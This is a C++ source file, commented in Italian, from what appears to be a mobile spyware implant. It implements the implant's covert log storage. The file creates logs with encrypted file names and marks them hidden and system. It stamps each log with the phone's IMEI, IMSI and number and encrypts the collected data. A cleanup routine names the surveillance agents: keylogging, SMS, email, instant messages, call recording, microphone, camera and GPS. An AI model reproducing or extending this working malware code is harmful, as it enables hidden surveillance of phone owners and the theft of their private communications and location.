#include "Log.h"
#include "Device.h"
#include "Conf.h"

Log::Log() : wName(NULL), wEncName(NULL), encryptionObj(NULL), hFile(INVALID_HANDLE_VALUE), bStoredToMmc(FALSE) {
	encryptionObj = new Encryption(g_AesKey, KEY_LEN);
	uberlogObj = UberLog::self();
}

BOOL Log::CreateLog(UINT LogType, BYTE* pByte, UINT uAdditional, BOOL bStoreToMMC) {
	LogStruct LogDescription;
	SYSTEMTIME st;
	FILETIME ft;
	UINT Seq = 0;
	DWORD dwWritten;
	WCHAR *completeName = NULL, wLogName[4 + 6 + 1]; // MANAGEMENT: LogType, Seq, NULL

	ZeroMemory(wLogName, sizeof(wLogName));

	// Questo log gia' esiste? Se si dobbiamo tornare con un errore
	if(hFile != INVALID_HANDLE_VALUE) {
		return FALSE;
	}

	// Il file non dovrebbe esistere, ma nel caso effettuiamo un loop fino a trovare
	// un posticino per questo log.
	while(1) {
		if(wName) {
			delete[] wName;
			wName = NULL;
		}

		// XXX se si cambia questo formato va cambiato anche nel metodo ScanLogs() di UberLog
		wsprintf(wLogName, L"%04x%06x", LogType, Seq);

		wName = MakeName(wLogName, TRUE, bStoreToMMC);

		if(wName == NULL)
			return FALSE;

		hFile = CreateFile(wName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile == INVALID_HANDLE_VALUE) {
			break;
		}

		CloseHandle(hFile); // Chiudo il file
		Seq++;

		if(Seq > 0x00ffffff) { // Creiamo un punto di stop
			CloseLog();
			return FALSE;
		}
	}

	hFile = CreateFile(wName, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hFile == INVALID_HANDLE_VALUE){
		CloseLog();
		return FALSE;
	}

	SetFileAttributes(wName, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM);

	Device *deviceObj = Device::self();

	if(deviceObj == NULL) {
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	// Aggiorniamo lo stato dell'oggetto
	uLogType = LogType;
	uLogSeq = Seq;
	bStoredToMmc = bStoreToMMC;

	GetSystemTime(&st);
	SystemTimeToFileTime(&st, &ft);

	// Comunichiamo alla superclass la creazione di un nuovo log
	uberlogObj->Add(wName, uLogType, uLogSeq, ft, bStoredToMmc);

	// Riempiamo i membri della struttura
	ZeroMemory(&LogDescription, sizeof(LogDescription));
	LogDescription.uVersion = LOG_VERSION_01;
	LogDescription.uLogType = LogType;
	LogDescription.uHTimestamp = ft.dwHighDateTime;
	LogDescription.uLTimestamp = ft.dwLowDateTime;
	LogDescription.uAdditionalData = uAdditional;
	LogDescription.uDeviceIdLen = WideLen((deviceObj->GetImei())); // XXX Non sono NULL-terminati
	LogDescription.uUserIdLen = WideLen(deviceObj->GetImsi());
	LogDescription.uSourceIdLen = WideLen(deviceObj->GetPhoneNumber());

	// Creiamo un buffer grande abbastanza da contenere l'header e gli additional data
	UINT uHeaderLen = sizeof(LogDescription) + LogDescription.uDeviceIdLen + LogDescription.uUserIdLen
							+ LogDescription.uSourceIdLen + LogDescription.uAdditionalData;

	// Paddiamo la dimensione al prossimo AES block
	BYTE *pHeader = new(std::nothrow) BYTE[encryptionObj->GetNextMultiple(uHeaderLen)];

	if(pHeader == NULL) {
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	ZeroMemory(pHeader, encryptionObj->GetNextMultiple(uHeaderLen));

	// Copiamo nel buffer tutti i dati dell'header
	BYTE *pTmp = pHeader;

	memcpy(pTmp, &LogDescription, sizeof(LogDescription));
	pTmp += sizeof(LogDescription);

	if(LogDescription.uDeviceIdLen) {
		memcpy(pTmp, deviceObj->GetImei(), WideLen(deviceObj->GetImei()));
		pTmp += WideLen(deviceObj->GetImei());
	}

	if(LogDescription.uUserIdLen) {
		memcpy(pTmp, deviceObj->GetImsi(), WideLen(deviceObj->GetImsi()));
		pTmp += WideLen(deviceObj->GetImsi());
	}

	if(LogDescription.uSourceIdLen) {
		memcpy(pTmp, deviceObj->GetPhoneNumber(), WideLen(deviceObj->GetPhoneNumber()));
		pTmp += WideLen(deviceObj->GetPhoneNumber());
	}

	if(LogDescription.uAdditionalData) {
		memcpy(pTmp, pByte, uAdditional);
	}

	// Cifriamo tutto l'header
	UINT tHeaderLen = encryptionObj->GetNextMultiple(uHeaderLen);
	BYTE* pEncryptedHeader = encryptionObj->EncryptData(pHeader, &tHeaderLen);

	delete[] pHeader;
	pHeader = NULL;

	if(pEncryptedHeader == NULL){
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	// Scriviamo la prima DWORD in chiaro che indica la dimensione dell'header paddato
	if(WriteFile(hFile, (BYTE *)&tHeaderLen, sizeof(UINT), &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] pEncryptedHeader;
		return FALSE;
	}


	// Scriviamo ora l'header cifrato e gli additional data
	if(WriteFile(hFile, pEncryptedHeader, tHeaderLen, &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] pEncryptedHeader;
		return FALSE;
	}

	delete[] pEncryptedHeader;
	pEncryptedHeader = NULL;

	return TRUE;
}

BOOL Log::WriteLog(BYTE* pByte, UINT uLen) {
	DWORD dwWritten;
	UINT t_len = uLen;
	BYTE* encrypted = NULL;

	if(hFile == INVALID_HANDLE_VALUE){
		return FALSE;
	}

	// Cifra i byte e scrivili
	encrypted = encryptionObj->EncryptData(pByte, &t_len);

	if(encrypted == NULL){
		RemoveLog(wName);
		CloseLog();
		return FALSE;
	}

	// Spostati alla fine del file
	SetFilePointer(hFile, 0, 0, FILE_END);

	// Scriviamo la dword che identifica la quantita' (in chiaro, unpaddato) di byte nel blocco
	if(WriteFile(hFile, (BYTE *)&uLen, sizeof(UINT), &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] encrypted;
		return FALSE;
	}

	// E poi i dati cifrati
	if(WriteFile(hFile, encrypted, t_len, &dwWritten, NULL) == FALSE){
		RemoveLog(wName);
		CloseLog();
		delete[] encrypted;
		return FALSE;
	}

	// Lasciamo aperto l'handle al log, verra' usato dalla AppendLog()
	delete[] encrypted;
	return TRUE;
}

BOOL Log::CloseLog() {
	uberlogObj->Close(wName, bStoredToMmc);

	if(hFile != INVALID_HANDLE_VALUE){
		CloseHandle(hFile);
		hFile = INVALID_HANDLE_VALUE;
	}

	if(wName){
		delete[] wName;
		wName = NULL;
	}

	if(wEncName){
		free(wEncName);
		wEncName = NULL;
	}

	return TRUE;
}

// wLogName proviene dalla CreateFile() del log, quindi e' gia' completo di path
BOOL Log::RemoveLog(WCHAR* wLogName) {

	if(wLogName == NULL)
		return FALSE;

	return uberlogObj->Delete(wLogName);
}

BOOL Log::WriteMarkup(UINT uAgentId, BYTE *pData, UINT uLen) {
	HANDLE hMarkup = INVALID_HANDLE_VALUE;
	WCHAR *wMarkup = NULL, wMarkupName[1 + 4 + 1]; // M + Agent ID + NULL
	UINT uDataLen = uLen;
	BYTE *pEncData = NULL;
	DWORD dwWritten = 0;

	if(pData == NULL || uLen == 0)
		return FALSE;

	ZeroMemory(wMarkupName, sizeof(wMarkupName));
	wsprintf(wMarkupName, L"M%04x", uAgentId);

	wMarkup = MakeName(wMarkupName, TRUE);

	if(wMarkup == NULL)
		return FALSE;

	hMarkup = CreateFile(wMarkup, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hMarkup == INVALID_HANDLE_VALUE) {
		delete[] wMarkup;
		return FALSE;
	}

	SetFileAttributes(wMarkup, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM);

	delete[] wMarkup;

	// Cifriamo i dati
	pEncData = encryptionObj->EncryptData(pData, &uDataLen);

	if(pEncData == NULL) {
		CloseHandle(hMarkup);
		return FALSE;
	}

	// Scriviamo la DWORD che indica la dimensione del blocco in chiaro
	if(WriteFile(hMarkup, (BYTE *)&uLen, sizeof(uLen), &dwWritten, NULL) == FALSE) {
		CloseHandle(hMarkup);
		delete[] pEncData;
		return FALSE;
	}

	// Scriviamo il blocco cifrato
	if(WriteFile(hMarkup, pEncData, uDataLen, &dwWritten, NULL) == FALSE) {
		CloseHandle(hMarkup);
		delete[] pEncData;
		return FALSE;
	}

	// Chiudiamo il file e liberiamo il buffer
	CloseHandle(hMarkup);
	delete[] pEncData;

	return TRUE;
}

BYTE* Log::ReadMarkup(UINT uAgentId, UINT *uLen) {
	HANDLE hMarkup = INVALID_HANDLE_VALUE;
	WCHAR *wMarkup = NULL, wMarkupName[1 + 4 + 1]; // M + Agent ID + NULL
	UINT uDataLen;
	BYTE *pDecData = NULL, *pData = NULL;
	DWORD dwRead = 0;

	ZeroMemory(wMarkupName, sizeof(wMarkupName));
	wsprintf(wMarkupName, L"M%04x", uAgentId);

	wMarkup = MakeName(wMarkupName, TRUE);

	if(wMarkup == NULL)
		return NULL;

	hMarkup = CreateFile(wMarkup, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hMarkup == INVALID_HANDLE_VALUE) {
		delete[] wMarkup;
		return NULL;
	}

	delete[] wMarkup;

	// Leggiamo la DWORD che indica la dimensione del blocco in chiaro
	if(ReadFile(hMarkup, (BYTE *)&uDataLen, sizeof(uDataLen), &dwRead, NULL) == FALSE) {
		CloseHandle(hMarkup);
		return NULL;
	}

	// Diciamo al chiamante quanti byte sono validi nel blocco
	*uLen = uDataLen;

	// Allochiamo memoria per la lettura dei dati
	pData = new(std::nothrow) BYTE[encryptionObj->GetNextMultiple(uDataLen)];

	if(pData == NULL) {
		CloseHandle(hMarkup);
		return NULL;		
	}

	ZeroMemory(pData, encryptionObj->GetNextMultiple(uDataLen));

	// Leggiamo il blocco cifrato
	if(ReadFile(hMarkup, pData, encryptionObj->GetNextMultiple(uDataLen), &dwRead, NULL) == FALSE) {
		delete[] pDecData;
		CloseHandle(hMarkup);
		return NULL;
	}

	// Chiudiamo il file
	CloseHandle(hMarkup);

	// Decifriamo i dati
	pDecData = encryptionObj->DecryptData(pData, &uDataLen);
	
	if(pDecData == NULL) {
		delete[] pData;
		return NULL;
	}

	// Liberiamo il buffer
	delete[] pData;

	return pDecData;
}

BOOL Log::IsMarkup(UINT uAgentId) {
	HANDLE hMarkup = INVALID_HANDLE_VALUE;
	WCHAR *wMarkup = NULL, wMarkupName[1 + 4 + 1]; // M + Agent ID + NULL

	ZeroMemory(wMarkupName, sizeof(wMarkupName));
	wsprintf(wMarkupName, L"M%04x", uAgentId);

	wMarkup = MakeName(wMarkupName, TRUE);

	if(wMarkup == NULL)
		return NULL;

	hMarkup = CreateFile(wMarkup, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	delete[] wMarkup;

	if(hMarkup == INVALID_HANDLE_VALUE)	
		return FALSE;

	CloseHandle(hMarkup);
	return TRUE;
}

BOOL Log::RemoveMarkup(UINT uAgentId){
	HANDLE hMarkup = INVALID_HANDLE_VALUE;
	WCHAR *wMarkup = NULL, wMarkupName[1 + 4 + 1]; // M + Agent ID + NULL

	ZeroMemory(wMarkupName, sizeof(wMarkupName));
	wsprintf(wMarkupName, L"M%04x", uAgentId);

	wMarkup = MakeName(wMarkupName, TRUE);

	if(wMarkup == NULL)
		return FALSE;

	if(DeleteFile(wMarkup) == FALSE) {
		delete[] wMarkup;
		return FALSE;
	}
	
	delete[] wMarkup;
	return TRUE;
}

// Cancella tutti i markup
// MANAGEMENT - Aggiungere qui tutti i nuovi agenti/eventi
void Log::RemoveMarkups() {
	RemoveMarkup(AGENT_SMS);
	RemoveMarkup(AGENT_PHONEBOOK);
	RemoveMarkup(AGENT_CALLLIST);
	RemoveMarkup(AGENT_DEVICE);
	RemoveMarkup(AGENT_GPS);
	RemoveMarkup(AGENT_CALL);
	RemoveMarkup(AGENT_CALL_LOCAL);
	RemoveMarkup(AGENT_KEYLOG);
	RemoveMarkup(AGENT_SNAPSHOT);
	RemoveMarkup(AGENT_URL);
	RemoveMarkup(AGENT_IM);
	RemoveMarkup(AGENT_EMAIL);
	RemoveMarkup(AGENT_MIC);
	RemoveMarkup(AGENT_CAM);

	RemoveMarkup(EVENT_TIMER);
	RemoveMarkup(EVENT_SMS);
	RemoveMarkup(EVENT_CALL);
	RemoveMarkup(EVENT_CONNECTION);
	RemoveMarkup(EVENT_PROCESS);
	RemoveMarkup(EVENT_POSITION);
	RemoveMarkup(EVENT_QUOTA);
	RemoveMarkup(EVENT_SIM_CHANGE);

	return;
}

void Log::RemoveLogDirs() {
	WCHAR *pMmc = NULL, *pLocal = NULL;

	pLocal = GetCurrentPath(NULL);

	if(pLocal)
		RemoveDirectory(pLocal);

	delete[] pLocal;

	pMmc = GetMMCPath(NULL);

	if(pMmc)
		RemoveDirectory(pMmc);

	delete[] pMmc;
}

WCHAR* Log::MakeName(WCHAR *wName, BOOL bAddPath, BOOL bStoreToMMC) {
	WCHAR *wLogName = NULL;

	if(wName == NULL || wcslen(wName) == 0)
		return NULL;

	// Nome dei log: QMLxxx...xxx.mob
	// XXX Se si cambia il nome dei log, cambiarlo anche nel nel metodo ScanLogs() di UberLog
	wLogName = new(std::nothrow) WCHAR[wcslen(L"XXX.xxx") + wcslen(wName) + 1];

	if(wLogName == NULL)
		return FALSE;

	ZeroMemory(wLogName, WideLen(L"XXX.xxx") + WideLen(wName) + sizeof(WCHAR));

	wsprintf(wLogName, L"%s%s%s", LOG_PREFIX, wName, LOG_EXTENSION);
	wEncName = encryptionObj->EncryptName(wLogName, g_Challenge[0]);

	if(wEncName == NULL) {
		delete[] wLogName;
		return NULL;
	}

	if(bAddPath) {
		delete[] wLogName;
		wLogName = NULL;

		if(bStoreToMMC)
			wLogName = GetMMCPath(wEncName);
		else
			wLogName = GetCurrentPath(wEncName);
	}

	if(wEncName) {
		free(wEncName);
		wEncName = NULL;
	}

	if(wLogName)
		return wLogName;

	return NULL;
}

WCHAR* Log::MakeName(UINT uAgentId, BOOL bAddPath) {
	WCHAR wLogName[10];

	ZeroMemory(wLogName, sizeof(wLogName));
	wsprintf(wLogName, L"%06x", uAgentId);

	return MakeName(wLogName, bAddPath);
}

Log::~Log() {
	list<LogInfo>::iterator iter;

	CloseLog();

	if(encryptionObj)
		delete encryptionObj;
}
